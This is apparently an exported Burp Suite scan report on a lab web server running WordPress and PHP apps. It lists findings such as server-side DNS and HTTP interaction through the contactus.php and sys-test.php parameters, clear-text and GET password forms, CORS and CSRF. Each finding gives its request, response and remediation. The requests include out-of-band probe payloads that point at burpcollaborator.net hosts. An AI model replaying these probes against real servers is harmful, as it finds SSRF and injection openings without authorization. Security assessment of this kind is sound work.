Request 1

GET /register HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:16 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2292
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
   <title></title>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link href="/css/style.css" rel="stylesheet">
<
...[SNIP]...
<div>
               <form method="post" enctype="multipart/form-data">
           <table>
...[SNIP]...
<td>
                       <input type="password" name="password" value="" />
                   </td>
...[SNIP]...
1.7.4. http://10.250.200.5:8080/
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request 1

GET / HTTP/1.1
Host: 10.250.200.5:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2682
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 11:43:32 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
<div class="panel-body">
<form action="/login" role="form">
<div class="form-group">
...[SNIP]...
<div class="form-group">
<input type="password" name="password" class="form-control" placeholder="Password" />
</div>
...[SNIP]...
1.8. External service interaction (DNS)
Previous  Next

There are 2 instances of this issue:

Issue background

External service interaction arises when it is possible to induce an application to interact with an arbitrary external service, such as a web or mail server. The ability to trigger arbitrary external service interactions does not constitute a vulnerability in its own right, and in some cases might even be the intended behavior of the application. However, in many cases, it can indicate a vulnerability with serious consequences.

In cases where DNS-based interactions can be triggered, it is normally possible to trigger interactions using other service types, and these are reported as separate issues. If a payload that specifies a particular service type (e.g. a URL) triggers only a DNS-based interaction, then this strongly indicates that the application attempted to connect using that other service, but was prevented from doing so by egress filters in place at the network layer. The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.

Issue remediation

You should review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary external service interactions is intended behavior. If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures. These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter.

If the ability to trigger arbitrary external service interactions is not intended behavior, then you should implement a whitelist of permitted services and hosts, and block any interactions that do not appear on this whitelist.

References



1.8.1. http://10.250.200.5:81/contactus.php [f parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /contactus.php

Issue detail

It is possible to induce the application to perform server-side DNS lookups of arbitrary domain names.

The payload http://k4pc9d29ygecxg8bopcdxibmqdw5ytohf45su.burpcollaborator.net/?contact.txt was submitted in the f parameter.

The application performed a DNS lookup of the specified domain.

Request 1

GET /contactus.php?f=http%3a%2f%2fk4pc9d29ygecxg8bopcdxibmqdw5ytohf45su.burpcollaborator.net%2f%3fcontact.txt HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:12 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1611
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...

Collaborator DNS interaction

The Collaborator server received a DNS lookup of type AAAA for the domain name k4pc9d29ygecxg8bopcdxibmqdw5ytohf45su.burpcollaborator.net.

The lookup was received from IP address 128.39.113.1 at 2017-nov-08 11:48:12 UTC.
1.8.2. http://10.250.200.5:81/sys-test.php [test parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /sys-test.php

Issue detail

It is possible to induce the application to perform server-side DNS lookups of arbitrary domain names.

The payload knbcsdl9hgxcggrb7pvdgium9df75vyjp6fu4.burpcollaborator.net was submitted in the test parameter.

The application performed a DNS lookup of the specified domain.

Request 1

GET /sys-test.php?test=knbcsdl9hgxcggrb7pvdgium9df75vyjp6fu4.burpcollaborator.net HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:56:02 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 66
Connection: close
Content-Type: text/html; charset=UTF-8

round-trip min/avg/max/stddev = 43.332/43.332/43.332/0.000 ms</br>

Collaborator DNS interaction

The Collaborator server received a DNS lookup of type A for the domain name knbcsdl9hgxcggrb7pvdgium9df75vyjp6fu4.burpcollaborator.net.

The lookup was received from IP address 128.39.113.1 at 2017-nov-08 11:56:02 UTC.
1.9. External service interaction (HTTP)
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /contactus.php

Issue detail

It is possible to induce the application to perform server-side HTTP requests to arbitrary domains.

The payload http://d3h58612x9d5w974nib6wbafp6vyxmnaex4lt.burpcollaborator.net/?contact.txt was submitted in the f parameter.

The application performed an HTTP request to the specified domain.

Issue background

External service interaction arises when it is possible to induce an application to interact with an arbitrary external service, such as a web or mail server. The ability to trigger arbitrary external service interactions does not constitute a vulnerability in its own right, and in some cases might even be the intended behavior of the application. However, in many cases, it can indicate a vulnerability with serious consequences.

The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.

Issue remediation

You should review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary external service interactions is intended behavior. If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures. These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter.

If the ability to trigger arbitrary external service interactions is not intended behavior, then you should implement a whitelist of permitted services and hosts, and block any interactions that do not appear on this whitelist.

References

Request 1

GET /contactus.php?f=http%3a%2f%2fd3h58612x9d5w974nib6wbafp6vyxmnaex4lt.burpcollaborator.net%2f%3fcontact.txt HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:12 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1611
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...

Collaborator HTTP interaction

The Collaborator server received an HTTP request.

The request was received from IP address 128.39.113.1 at 2017-nov-08 11:48:13 UTC.

Request to Collaborator

GET /?contact.txt HTTP/1.0
Host: d3h58612x9d5w974nib6wbafp6vyxmnaex4lt.burpcollaborator.net
Connection: close

Response from Collaborator

HTTP/1.1 200 OK
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 60

<html><body>kxtlooz8obw3n86ggdx6w7zjkugigjfigz</body></html>
2. Low severity issues
Previous  Next
2.1. Password submitted using GET method
Previous  Next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Issue background

Some applications use the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, applications should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request 1

GET / HTTP/1.1
Host: 10.250.200.5:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2682
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 11:43:32 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
<div class="panel-body">
<form action="/login" role="form">
<div class="form-group">
...[SNIP]...
<div class="form-group">
<input type="password" name="password" class="form-control" placeholder="Password" />
</div>
...[SNIP]...
2.2. Password field with autocomplete enabled
Previous  Next

There are 4 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains control over the user's computer. Further, an attacker who finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user's browser-stored credentials.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Please note that modern web browsers may ignore this directive. In spite of this there is a chance that not disabling autocomplete may cause problems obtaining PCI compliance.



2.2.1. http://10.250.200.5/wp-login.php
Previous  Next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /wp-login.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request 1

GET /wp-login.php HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:08 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 2193
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <!--[if IE 8]>
       <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
   <![endif]-->
   <!--[if !(IE 8) ]><!-->
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...
</h1>
   
<form name="loginform" id="loginform" action="http://10.250.200.5/wp-login.php" method="post">
   <p>
...[SNIP]...
<br />
       <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></label>
...[SNIP]...
2.2.2. http://10.250.200.5:81/login
Previous  Next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request 1

GET /login HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:59 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 882
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title></title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="/css/style.css" rel="st
...[SNIP]...
<body>
<form method="post">
<input type="text" name="username" />
<input type="password" name="password" />
<input type="submit" value="Log in">
...[SNIP]...
2.2.3. http://10.250.200.5:81/register
Previous  Next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /register

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request 1

GET /register HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:16 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2292
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
   <title></title>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link href="/css/style.css" rel="stylesheet">
<
...[SNIP]...
<div>
               <form method="post" enctype="multipart/form-data">
           <table>
...[SNIP]...
<td>
                       <input type="password" name="password" value="" />
                   </td>
...[SNIP]...
2.2.4. http://10.250.200.5:8080/
Previous  Next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request 1

GET / HTTP/1.1
Host: 10.250.200.5:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2682
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 11:43:32 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
<div class="panel-body">
<form action="/login" role="form">
<div class="form-group">
...[SNIP]...
<div class="form-group">
<input type="password" name="password" class="form-control" placeholder="Password" />
</div>
...[SNIP]...
2.3. Unencrypted communications
Previous  Next

There are 4 instances of this issue:

Issue description

The application allows users to connect to it over unencrypted connections. An attacker suitably positioned to view a legitimate user's network traffic could record and monitor their interactions with the application and obtain any information the user supplies. Furthermore, an attacker able to modify traffic could use the application as a platform for attacks against its users and third-party websites. Unencrypted connections have been exploited by ISPs and governments to track users, and to inject adverts and malicious JavaScript. Due to these concerns, web browser vendors are planning to visually flag unencrypted connections as hazardous.

To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.

Please note that using a mixture of encrypted and unencrypted communications is an ineffective defense against active attackers, because they can easily remove references to encrypted resources when these references are transmitted over an unencrypted connection.

Issue remediation

Applications should use transport-level encryption (SSL/TLS) to protect all communications passing between the client and the server. The Strict-Transport-Security HTTP header should be used to ensure that clients refuse to access the server over an insecure connection.

References



2.3.1. http://10.250.200.5/
Previous  Next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /
2.3.2. http://10.250.200.5:81/
Previous  Next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /
2.3.3. http://10.250.200.5:8080/
Previous  Next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /
2.3.4. http://detectportal.firefox.com/
Previous  Next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://detectportal.firefox.com
Path:   /
3. Informational issues
Previous
3.1. Cross-origin resource sharing
Previous  Next

There are 3 instances of this issue:

Issue background

An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.

If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially retrieve content from the application, and sometimes carry out actions within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by an attacker to exploit the trust relationship and attack the application that allows access. CORS policies on pages containing sensitive information should be reviewed to determine whether it is appropriate for the application to trust both the intentions and security posture of any domains granted access.

Issue remediation

Any inappropriate domains should be removed from the CORS policy.

References



3.1.1. http://10.250.200.5/wp-admin/admin-ajax.php
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /wp-admin/admin-ajax.php

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /wp-admin/admin-ajax.php HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check; wordpress_baf0a32bf708ebfb24022d9545b279af=+; wordpress_sec_baf0a32bf708ebfb24022d9545b279af=+; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+
Origin: http://10.250.200.5

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:46:24 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Access-Control-Allow-Origin: http://10.250.200.5
Access-Control-Allow-Credentials: true
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

0
3.1.2. http://10.250.200.5/wp-admin/admin-ajax.php/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /wp-admin/admin-ajax.php/

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /wp-admin/admin-ajax.php/ HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check; wordpress_baf0a32bf708ebfb24022d9545b279af=+; wordpress_sec_baf0a32bf708ebfb24022d9545b279af=+; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+
Origin: http://10.250.200.5

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:01 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Access-Control-Allow-Origin: http://10.250.200.5
Access-Control-Allow-Credentials: true
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

0
3.1.3. http://10.250.200.5/wp-json/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /wp-json/

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /wp-json/ HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+
Origin: http://10.250.200.5

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:54 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
X-Robots-Tag: noindex
Link: <http://10.250.200.5/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Access-Control-Allow-Headers: Authorization
Allow: GET
Access-Control-Allow-Origin: http://10.250.200.5
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Credentials: true
Content-Length: 998
Connection: close
Content-Type: application/json; charset=UTF-8

{"name":"Fairweather & sons","description":"Just another WordPress site","url":"http:\/\/10.250.200.5","home":"http:\/\/10.250.200.5","namespaces":["oembed\/1.0"],"authentication":[],"routes":{"\/":{"
...[SNIP]...
3.2. Cross-site request forgery
Previous  Next

There are 3 instances of this issue:

Issue background

Cross-site request forgery (CSRF) vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user that has issued a particular request. Because browsers automatically add cookies to requests regardless of their origin, it may be possible for an attacker to create a malicious web site that forges a cross-domain request to the vulnerable application. For a request to be vulnerable to CSRF, the following conditions must hold:

Issue remediation

The most effective way to protect against CSRF vulnerabilities is to include within relevant requests an additional token that is not transmitted in a cookie: for example, a parameter in a hidden form field. This additional token should contain sufficient entropy, and be generated using a cryptographic random number generator, such that it is not feasible for an attacker to determine or predict the value of any token that was issued to another user. The token should be associated with the user's session, and the application should validate that the correct token is received before performing any action resulting from the request.

An alternative approach, which may be easier to implement, is to validate that Host and Referer headers in relevant requests are both present and contain the same domain name. However, this approach is somewhat less robust: historically, quirks in browsers and plugins have often enabled attackers to forge cross-domain requests that manipulate these headers to bypass such defenses.

References



3.2.1. http://10.250.200.5/wp-login.php
Previous  Next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://10.250.200.5
Path:   /wp-login.php

Issue detail

The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.

Request 1

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/wp-login.php?action=lostpassword
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

user_login=555-555-0199@example.com&wp-submit=Get+New+Password&redirect_to=

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:24 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 2684
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <!--[if IE 8]>
       <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
   <![endif]-->
   <!--[if !(IE 8) ]><!-->
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...

Request 2

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://HSrfGgeH.com/wp-login.php?action=lostpassword
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

user_login=555-555-0199@example.com&wp-submit=Get+New+Password&redirect_to=

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:57 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
